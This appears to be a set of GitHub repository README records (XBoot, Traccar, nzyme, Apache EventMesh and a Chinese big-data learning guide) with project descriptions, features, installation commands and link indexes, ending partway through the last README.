[项目基本配置和使用相关技术栈文档【必读】](https://github.com/Exrick/x-boot/wiki/%E9%A1%B9%E7%9B%AE%E5%9F%BA%E6%9C%AC%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8%E7%9B%B8%E5%85%B3%E6%8A%80%E6%9C%AF%E6%A0%88%E6%96%87%E6%A1%A3%E3%80%90%E5%BF%85%E8%AF%BB%E3%80%91) -- [如何使用XBoot后端在30秒内开发出增删改接口](https://github.com/Exrick/x-boot/wiki/%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8XBoot%E5%90%8E%E7%AB%AF%E5%9C%A830%E7%A7%92%E5%86%85%E5%BC%80%E5%8F%91%E5%87%BA%E5%A2%9E%E5%88%A0%E6%94%B9%E6%8E%A5%E5%8F%A3) -- [具体XBoot增删改文档示例](https://github.com/Exrick/x-boot/wiki/CRUD) -- 完整版 - - [第三方社交账号登录配置](https://github.com/Exrick/x-boot/wiki/%E7%AC%AC%E4%B8%89%E6%96%B9%E7%A4%BE%E4%BA%A4%E8%B4%A6%E5%8F%B7%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE) - - 
[短信登录配置](https://github.com/Exrick/x-boot/wiki/%E7%9F%AD%E4%BF%A1%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE) - - [Vaptcha人机验证码配置使用](https://github.com/Exrick/x-boot/wiki/vaptcha%E4%BA%BA%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E9%85%8D%E7%BD%AE%E4%BD%BF%E7%94%A8) - - [Activiti工作流开发说明](https://github.com/Exrick/x-boot/wiki/Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E5%BC%80%E5%8F%91%E8%AF%B4%E6%98%8E) - -### [分布式扩展](https://github.com/alibaba/dubbo-spring-boot-starter/blob/master/README_zh.md) - -### XBoot后端学习分享(更新中) -1. [Spring Boot 2.x 区别总结](https://github.com/Exrick/x-boot/wiki/SpringBoot2.x%E5%8C%BA%E5%88%AB%E6%80%BB%E7%BB%93) - -2. [Spring Security整合JWT](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E6%95%B4%E5%90%88JWT) - -3. [Spring Security实现动态数据库权限管理](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E5%8A%A8%E6%80%81%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86) - -4. [Spring Boot 2.x整合Quartz](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Quartz) - -5. [基于Websocket实现发送消息后右上角消息图标红点实时显示](https://github.com/Exrick/x-boot/wiki/%E5%9F%BA%E4%BA%8EWebsocket%E5%AE%9E%E7%8E%B0%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF%E5%90%8E%E5%8F%B3%E4%B8%8A%E8%A7%92%E6%B6%88%E6%81%AF%E5%9B%BE%E6%A0%87%E7%BA%A2%E7%82%B9%E5%AE%9E%E6%97%B6%E6%98%BE%E7%A4%BA) - -6. 
[Spring Boot 2.x整合Activiti工作流以及模型设计器](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E4%BB%A5%E5%8F%8A%E6%A8%A1%E5%9E%8B%E8%AE%BE%E8%AE%A1%E5%99%A8) -### Docker下后端集群部署(更新中) - -> 前端集群部署请跳转至[xboot-front](https://github.com/Exrick/xboot-front)项目查看 - -1.[Docker的安装与常用命令](https://github.com/Exrick/x-boot/wiki/Docker%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4) - -2.基于PXC架构Mysql数据库集群搭建 - -3.Redis集群搭建 - -4.Elasticsearch集群搭建 - -5.XBoot后端集群部署 - -### 商用授权 -- 个人学习使用遵循GPL开源协议 -- 商用需联系作者授权 - -### 作者其他项目推荐 -- [XMall微信小程序APP前端 现已开源!](https://github.com/Exrick/xmall-weapp) - - [![WX20190924-234416@2x.png](https://s2.ax1x.com/2019/10/06/ucEsBD.md.png)](https://www.bilibili.com/video/av70226175) - -- [XMall:基于SOA架构的分布式电商购物商城](https://github.com/Exrick/xmall) - - ![](https://ooo.0o0.ooo/2018/07/22/5b54615b95788.jpg) - -- [XPay个人免签收款支付系统](https://github.com/Exrick/xpay) - -- 机器学习笔记 - - [Machine-Learning](https://github.com/Exrick/Machine-Learning) - -### 技术疑问交流 -- QQ交流群 `475743731(付费)`,可获取各项目详细图文文档、疑问解答 [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=7b60cec12ba93ebed7568b0a63f22e6e034c0d1df33125ac43ed753342ec6ce7) -- 免费交流群 `562962309` [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=52f6003e230b26addeed0ba6cf343fcf3ba5d97829d17f5b8fa5b151dba7e842) -- 作者博客:[http://blog.exrick.cn](http://blog.exrick.cn) -### [捐赠](http://xpay.exrick.cn/pay)",0 -traccar/traccar,Traccar GPS Tracking System,2012-04-16T08:33:49Z,,"# [Traccar](https://www.traccar.org) - -## Overview - -Traccar is an open source GPS tracking system. This repository contains Java-based back-end service. It supports more than 200 GPS protocols and more than 2000 models of GPS tracking devices. Traccar can be used with any major SQL database system. It also provides easy to use [REST API](https://www.traccar.org/traccar-api/). 
- -Other parts of Traccar solution include: - -- [Traccar web app](https://github.com/traccar/traccar-web) -- [Traccar Manager Android app](https://github.com/traccar/traccar-manager-android) -- [Traccar Manager iOS app](https://github.com/traccar/traccar-manager-ios) - -There is also a set of mobile apps that you can use for tracking mobile devices: - -- [Traccar Client Android app](https://github.com/traccar/traccar-client-android) -- [Traccar Client iOS app](https://github.com/traccar/traccar-client-ios) - -## Features - -Some of the available features include: - -- Real-time GPS tracking -- Driver behaviour monitoring -- Detailed and summary reports -- Geofencing functionality -- Alarms and notifications -- Account and device management -- Email and SMS support - -## Build - -Please read [build from source documentation](https://www.traccar.org/build/) on the official website. - -## Team - -- Anton Tananaev ([anton@traccar.org](mailto:anton@traccar.org)) -- Andrey Kunitsyn ([andrey@traccar.org](mailto:andrey@traccar.org)) - -## License - - Apache License, Version 2.0 - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. 
-",0 -nzymedefense/nzyme,Network Defense System.,2016-11-11T22:06:03Z,,"# nzyme - Network Defense System - -[![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/) -[![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license) - -Learn more at https://www.nzyme.org/. - -**Version 2.0.0 of nzyme is currently in development. The previous website for v1.x is archived [here](https://v1.nzyme.org/).** - -## Contributing - -There are many ways to contribute and all community interaction is absolutely welcome: - -* Open an issue for any kind of bug you think you have found. -* Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug. -* Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged. -* Write documentation. -* Write a blog post. -* Help a user in the issue tracker or the IRC channel (#nzyme on FreeNode.) -* Get in contact and say how you use it or what would be a cool addition. -* Tell the world. - -Please be aware of the [Code of Conduct](CODE_OF_CONDUCT.md) that will be enforced across all channels and platforms. - -## Legal notice - -Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data. -",0 -apache/eventmesh,EventMesh is a new generation serverless event middleware for building distributed event-driven applications.,2019-09-16T03:04:56Z,,"
- -

- -
- -[![CI status](https://img.shields.io/github/actions/workflow/status/apache/eventmesh/ci.yml?logo=github&style=for-the-badge)](https://github.com/apache/eventmesh/actions/workflows/ci.yml) -[![CodeCov](https://img.shields.io/codecov/c/gh/apache/eventmesh/master?logo=codecov&style=for-the-badge)](https://codecov.io/gh/apache/eventmesh) -[![Code Quality: Java](https://img.shields.io/lgtm/grade/java/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/context:java) -[![Total Alerts](https://img.shields.io/lgtm/alerts/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/alerts/) - -[![License](https://img.shields.io/github/license/apache/eventmesh?style=for-the-badge)](https://www.apache.org/licenses/LICENSE-2.0.html) -[![GitHub Release](https://img.shields.io/github/v/release/apache/eventmesh?style=for-the-badge)](https://github.com/apache/eventmesh/releases) -[![Slack Status](https://img.shields.io/badge/slack-join_chat-blue.svg?logo=slack&style=for-the-badge)](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g) - - -[📦 Documentation](https://eventmesh.apache.org/docs/introduction) | -[📔 Examples](https://github.com/apache/eventmesh/tree/master/eventmesh-examples) | -[⚙️ Roadmap](https://eventmesh.apache.org/docs/roadmap) | -[🌐 简体中文](README.zh-CN.md) -
-
-
-# Apache EventMesh
-
-**Apache EventMesh** is a new generation serverless event middleware for building distributed [event-driven](https://en.wikipedia.org/wiki/Event-driven_architecture) applications.
-
-### EventMesh Architecture
-
-![EventMesh Architecture](resources/eventmesh-architecture-4.png)
-
-### EventMesh Dashboard
-
-![EventMesh Dashboard](resources/dashboard.png)
-
-## Features
-
-Apache EventMesh has a vast amount of features to help users achieve their goals. Let us share with you some of the key features EventMesh has to offer:
-
-- Built around the [CloudEvents](https://cloudevents.io) specification.
-- Rapidly extensible interconnector layer of [connectors](https://github.com/apache/eventmesh/tree/master/eventmesh-connectors) using [openConnect](https://github.com/apache/eventmesh/tree/master/eventmesh-openconnect), such as sources or sinks for SaaS, cloud services, databases, etc.
-- Rapidly extensible storage layer, such as [Apache RocketMQ](https://rocketmq.apache.org), [Apache Kafka](https://kafka.apache.org), [Apache Pulsar](https://pulsar.apache.org), [RabbitMQ](https://rabbitmq.com), [Redis](https://redis.io).
-- Rapidly extensible meta layer, such as [Consul](https://consulproject.org/en/), [Nacos](https://nacos.io), [ETCD](https://etcd.io) and [Zookeeper](https://zookeeper.apache.org/).
-- Guaranteed at-least-once delivery.
-- Deliver events between multiple EventMesh deployments.
-- Event schema management by catalog service.
-- Powerful event orchestration by the [Serverless workflow](https://serverlessworkflow.io/) engine.
-- Powerful event filtering and transformation.
-- Rapid, seamless scalability.
-- Easy function development and framework integration.
-
-## Roadmap
-
-Please go to the [roadmap](https://eventmesh.apache.org/docs/roadmap) to get the release history and new features of Apache EventMesh.
-
-## Subprojects
-
-- [EventMesh-site](https://github.com/apache/eventmesh-site): Apache official website resources for EventMesh. 
-- [EventMesh-workflow](https://github.com/apache/eventmesh-workflow): Serverless workflow runtime for event orchestration on EventMesh.
-- [EventMesh-dashboard](https://github.com/apache/eventmesh-dashboard): Operation and maintenance console of EventMesh.
-- [EventMesh-catalog](https://github.com/apache/eventmesh-catalog): Catalog service for event schema management using AsyncAPI.
-- [EventMesh-go](https://github.com/apache/eventmesh-go): A Go implementation of the EventMesh runtime.

-## Quick start

-This section shows how to deploy EventMesh [locally](#run-eventmesh-runtime-locally), [with Docker](#run-eventmesh-runtime-in-docker), or [on Kubernetes](#run-eventmesh-runtime-in-kubernetes).

-These steps launch EventMesh with the default configuration; if you need more detailed deployment steps, please visit the [EventMesh official documentation](https://eventmesh.apache.org/docs/introduction).

-### Deploy an Event Store

-> EventMesh supports [multiple Event Stores](https://eventmesh.apache.org/docs/roadmap#event-store-implementation-status). The default storage mode is `standalone`, which does not rely on an external event store.

-### Run EventMesh Runtime locally

-#### 1. Download EventMesh

-Download the latest Binary Distribution from the [EventMesh Download](https://eventmesh.apache.org/download/) page and extract it:

-```shell
-wget https://dlcdn.apache.org/eventmesh/1.10.0/apache-eventmesh-1.10.0-bin.tar.gz
-tar -xvzf apache-eventmesh-1.10.0-bin.tar.gz
-cd apache-eventmesh-1.10.0
-```

-#### 2. Run EventMesh

-Execute the `start.sh` script to start the EventMesh Runtime server:

-```shell
-bash bin/start.sh
-```

-View the output log:

-```shell
-tail -n 50 -f logs/eventmesh.out
-```

-When the log output shows server `state:RUNNING`, EventMesh Runtime has started successfully.
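Instead of eyeballing the log, the readiness check above can be scripted. A minimal sketch, assuming the default log location from the previous step (`logs/eventmesh.out`) and the `state:RUNNING` message shown there; `wait_for_eventmesh` is a hypothetical helper name, not part of EventMesh:

```shell
# Poll the runtime log until it reports RUNNING, or give up after a timeout.
# Usage: wait_for_eventmesh [logfile] [timeout_seconds]
wait_for_eventmesh() {
  log="${1:-logs/eventmesh.out}"
  timeout="${2:-60}"
  i=0
  while [ "$i" -lt "$timeout" ]; do
    # Succeed as soon as the runtime reports RUNNING in its log.
    grep -q "state:RUNNING" "$log" 2>/dev/null && return 0
    sleep 1
    i=$((i + 1))
  done
  return 1 # timed out
}
```

For example: `wait_for_eventmesh && echo "EventMesh Runtime is up"`.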
-
-You can stop the run with the following command:

-```shell
-bash bin/stop.sh
-```

-When the script prints `shutdown server ok!`, it means EventMesh Runtime has stopped.

-### Run EventMesh Runtime in Docker

-#### 1. Pull EventMesh Image

-Use the following command to pull the latest version of the [EventMesh](https://hub.docker.com/r/apache/eventmesh) image:

-```shell
-sudo docker pull apache/eventmesh:latest
-```

-#### 2. Run and Manage EventMesh Container

-Use the following command to start the EventMesh container:

-```shell
-sudo docker run -d --name eventmesh -p 10000:10000 -p 10105:10105 -p 10205:10205 -p 10106:10106 -t apache/eventmesh:latest
-```

-Enter the container:

-```shell
-sudo docker exec -it eventmesh /bin/bash
-```

-View the log:

-```shell
-cd logs
-tail -n 50 -f eventmesh.out
-```

-### Run EventMesh Runtime in Kubernetes

-#### 1. Deploy operator

-Run the following commands (to delete the deployment, simply replace `deploy` with `undeploy`):

-```shell
-$ cd eventmesh-operator && make deploy
-```

-Run `kubectl get pods` and `kubectl get crd | grep eventmesh-operator.eventmesh` to see the status of the deployed eventmesh-operator:

-```shell
-$ kubectl get pods
-NAME                                  READY   STATUS    RESTARTS   AGE
-eventmesh-operator-59c59f4f7b-nmmlm   1/1     Running   0          20s

-$ kubectl get crd | grep eventmesh-operator.eventmesh
-connectors.eventmesh-operator.eventmesh   2024-01-10T02:40:27Z
-runtimes.eventmesh-operator.eventmesh     2024-01-10T02:40:27Z
-```

-#### 2. Deploy EventMesh Runtime

-Execute the following command to deploy the runtime and connector-rocketmq (to delete them, simply replace `create` with `delete`):

-```shell
-$ make create
-```

-Run `kubectl get pods` to see if the deployment was successful.
- -```shell -NAME READY STATUS RESTARTS AGE -connector-rocketmq-0 1/1 Running 0 9s -eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 3m12s -eventmesh-runtime-0-a-0 1/1 Running 0 15s -``` - -## Contributing - -Each contributor has played an important role in promoting the robust development of Apache EventMesh. We sincerely appreciate all contributors who have contributed code and documents. - -- [Contributing Guideline](https://eventmesh.apache.org/community/contribute/contribute) -- [Good First Issues](https://github.com/apache/eventmesh/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) - -Here is the [List of Contributors](https://github.com/apache/eventmesh/graphs/contributors), thank you all! :) - - - - - - -## CNCF Landscape - -
- - - - -Apache EventMesh enriches the CNCF Cloud Native Landscape. - -
- -## License - -Apache EventMesh is licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html). - -## Community - -| WeChat Assistant | WeChat Public Account | Slack | -|---------------------------------------------------------|--------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------| -| | | [Join Slack Chat](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)(Please open an issue if this link is expired) | - -Bi-weekly meeting : [#Tencent meeting](https://meeting.tencent.com/dm/wes6Erb9ioVV) : 346-6926-0133 - -Bi-weekly meeting record : [bilibili](https://space.bilibili.com/1057662180) - -### Mailing List - -| Name | Description | Subscribe | Unsubscribe | Archive | -|-------------|---------------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------| -| Users | User discussion | [Subscribe](mailto:users-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:users-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?users@eventmesh.apache.org) | -| Development | Development discussion (Design Documents, Issues, etc.) 
| [Subscribe](mailto:dev-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?dev@eventmesh.apache.org) |
-| Commits | Commits to related repositories | [Subscribe](mailto:commits-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:commits-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?commits@eventmesh.apache.org) |
-| Issues | Comments and reviews on issues and PRs | [Subscribe](mailto:issues-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:issues-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?issues@eventmesh.apache.org) |
-",0
-MoRan1607/BigDataGuide,大数据学习,从零开始学习大数据,包含大数据学习各阶段学习视频、面试资料,2019-11-30T12:02:52Z,,"Big Data Learning Guide
-===
->A guide to learning big data development from scratch, covering materials for every stage of the journey

-## WeChat Public Account
-Follow my WeChat public account, **旧时光大数据**, and reply with the relevant keyword to get more big data tips and materials
-The videos and documents I have personally watched in the "Big Data Learning Path" are available as cloud-drive links directly from the public account

-## Updating...
-#### Nowcoder interview write-ups
-#### Big data interview questions

-### 《[Big Data Interview Questions V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)》 is out; reply "大数据面试题" to the public account

-

- -

-

-

-
-## Knowledge Planet (知识星球)

-The Knowledge Planet community includes **learning paths**, **learning materials** (three editions by programming language: Java, Python, and Java+Scala), projects (**50+ big data projects**), interview questions (**700+ real big data interview questions**, plus Java fundamentals, computer networks, and Redis), **1,000+ real big data interview write-ups**, 600+ real Java backend interview write-ups (organized by company), and my own video study notes

-**[知识星球资料介绍](https://www.yuque.com/vxo919/gyyog3/ohvyc2e38pprcxkn?singleDoc=)**

-

- -

-

-

-
-Overview
---
-[大数据简介](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%AE%80%E4%BB%8B.md)

-[大数据相关岗位介绍](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9B%B8%E5%85%B3%E5%B2%97%E4%BD%8D%E4%BB%8B%E7%BB%8D.md)

-Big Data Learning Path
---
-For the videos and documents in the learning path, follow the public account 旧时光大数据 and reply with the relevant keyword to get cloud-drive links

-[大数据学习路线(包含自己看过的视频链接)](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF.md)

-Programming Languages
---
-For programming languages, I suggest JavaSE first, and Scala before Spark and Flink. If time is tight, just find a Java-based Spark or Flink tutorial. Whether to learn Python depends on you and your job, but with a Java foundation Python comes much faster (don't ask me how to learn it; the answer is simply to study as hard as you can [ 吃瓜.jpg ])
-### 一、JavaSE (pick one)
-[刘意2019版](https://www.bilibili.com/video/BV1gb411F76B?from=search&seid=16116797084076868427)

-[尚硅谷宋红康版](https://www.bilibili.com/video/BV1Kb411W75N?from=search&seid=9321658006825735818)

-### 二、Scala (pick one)
-If you are short on time, watch one of the three-to-five-day courses that accompany Spark to get up to speed quickly

-[韩顺平老师版](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134)

-[清华硕士武晟然老师版](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134)

-### 三、Python
-I recommend the 黑马 Python videos: easy to follow, with fairly complete documentation; with a Java foundation, Python is quick to pick up

-[黑马Python版视频](https://www.bilibili.com/video/BV1C4411A7ej?from=search&seid=11669436417044703145)

-[Python文档and笔记](https://github.com/MoRan1607/BigDataGuide/blob/master/Python/Python%E6%96%87%E6%A1%A3.md)

-Linux
---
-[完全分布式集群搭建文档](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/%E5%88%86%E5%B8%83%E5%BC%8F%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA.md)

-For installing the VM and remote login tools, you can refer to my blog for now and follow the corresponding steps

-[集群搭建](https://blog.csdn.net/qq_41544550/category_9458240.html)

-Big Data Frameworks and Components
---
-### 一、Hadoop

-  1. [Hadoop——分布式文件管理系统HDFS](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS.md)
-  2. [Hadoop——HDFS的Shell操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Shell%E6%93%8D%E4%BD%9C.md)
-  3. 
[Hadoop——HDFS的Java API操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Java%20API%E6%93%8D%E4%BD%9C.md) -  4. [Hadoop——分布式计算框架MapReduce](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce.md) -  5. [Hadoop——MapReduce案例](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce%E6%A1%88%E4%BE%8B.md) -  6. [Hadoop——资源调度器YARN](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/YARN.md) -  7. [Hadoop——Hadoop数据压缩](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/Hadoop%E6%95%B0%E6%8D%AE%E5%8E%8B%E7%BC%A9.md) - -### 二、Zookeeper -  1.[Zookeeper——Zookeeper概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%80%EF%BC%89.md) -  2.[Zookeeper——Zookeeper单机和分布式安装](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%8C%EF%BC%89.md) -  3.[Zookeeper——Zookeeper客户端命令](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%89%EF%BC%89.md) -  4.[Zookeeper——Zookeeper内部原理](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E5%9B%9B%EF%BC%89.md) -  5.[Zookeeper——Zookeeper实战](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%94%EF%BC%89.md) - -### 三、Hive -  1.[Hive——Hive概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/1%E3%80%81Hive%E6%A6%82%E8%BF%B0.md) -  2.[Hive——Hive数据类型](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/2%E3%80%81Hive%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B.md) -  3.[Hive——Hive DDL数据定义](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/3%E3%80%81Hive%20DDL%E6%95%B0%E6%8D%AE.md) -  4.[Hive——Hive DML数据操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/4%E3%80%81Hive%20DML%E6%95%B0%E6%8D%AE%E6%93%8D%E4%BD%9C.md) -  5.[Hive——Hive查询](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/5%E3%80%81Hive%E6%9F%A5%E8%AF%A2.md) -  
6.[Hive——Hive函数](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/6%E3%80%81Hive%E5%87%BD%E6%95%B0.md) -  7.[Hive——Hive压缩和存储](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/7%E3%80%81Hive%E5%8E%8B%E7%BC%A9%E5%92%8C%E5%AD%98%E5%82%A8.md) -  8.[Hive——Hive实战:统计影音视频网站的常规指标](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/8%E3%80%81Hive%E5%AE%9E%E6%88%98%EF%BC%9A%E7%BB%9F%E8%AE%A1%E5%BD%B1%E9%9F%B3%E8%A7%86%E9%A2%91%E7%BD%91%E7%AB%99%E7%9A%84%E5%B8%B8%E8%A7%84%E6%8C%87%E6%A0%87.md) -  9.[Hive——Hive分区表和分桶表](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/9%E3%80%81%E5%88%86%E5%8C%BA%E8%A1%A8%E5%92%8C%E5%88%86%E6%A1%B6%E8%A1%A8.md) -  10.[Hive——Hive调优](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/10%E3%80%81Hive%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B0%83%E4%BC%98.md) - -### 四、Flume -  1.[Flume——Flume概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/1%E3%80%81Flume%E6%A6%82%E8%BF%B0.md) -  2.[Flume——Flume实践操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/2%E3%80%81Flume%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) -  3.[Flume——Flume案例](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/3%E3%80%81Flume%E6%A1%88%E4%BE%8B.md) - -### 五、Kafka -  1.[Kafka——Kafka概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/1%E3%80%81Kafka%E6%A6%82%E8%BF%B0.md) -  2.[Kafka——Kafka深入解析](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/2%E3%80%81Kafka%E6%B7%B1%E5%85%A5%E8%A7%A3%E6%9E%90.md) -  3.[Kafka——Kafka API操作实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/3%E3%80%81Kafka%20API%E6%93%8D%E4%BD%9C%E5%AE%9E%E8%B7%B5.md) -  3.[Kafka——Kafka对接Flume实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/4%E3%80%81Flume%E5%AF%B9%E6%8E%A5Kafka%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) - -### 六、HBase -  1.[HBase——HBase概述](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/1%E3%80%81HBase%E6%A6%82%E8%BF%B0.md) -  
2.[HBase——HBase数据结构](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/2%E3%80%81HBase%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84.md) -  3.[HBase——HBase Shell操作](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/3%E3%80%81HBase%20Shell%E6%93%8D%E4%BD%9C.md) -  4.[HBase——HBase API实践操作](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/4%E3%80%81HBase%20API%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) - -### 七、Spark -#### Spark基础 -  1.[Spark基础——Spark的诞生](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/1%E3%80%81Spark%E7%9A%84%E8%AF%9E%E7%94%9F.md) -  2.[Spark基础——Spark概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md) -  3.[Spark基础——Spark运行模式](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/3%E3%80%81Spark%E8%BF%90%E8%A1%8C%E6%A8%A1%E5%BC%8F.md) -  4.[Spark基础——案例实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md) -#### Spark Core -  1.[Spark Core——RDD概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/1%E3%80%81RDD%E6%A6%82%E8%BF%B0.md) -  2.[Spark Core——RDD编程(一)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/2%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%88%E4%B8%80%EF%BC%89.md) -  3.[Spark Core——RDD编程(二)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/3%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%882%EF%BC%89.md) -  4.[Spark Core——键值对RDD数据分区器](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/4%E3%80%81%E9%94%AE%E5%80%BC%E5%AF%B9RDD%E6%95%B0%E6%8D%AE%E5%88%86%E5%8C%BA%E5%99%A8.md) -  5.[Spark Core——数据读取与保存](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/5%E3%80%81%E6%95%B0%E6%8D%AE%E8%AF%BB%E5%8F%96%E4%B8%8E%E4%BF%9D%E5%AD%98.md) -#### Spark SQL -  1.[Spark SQL——Spaek SQL概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/1%E3%80%81Spark%20SQL%E6%A6%82%E8%BF%B0.md) -  2.[Spark SQL——Spaek 
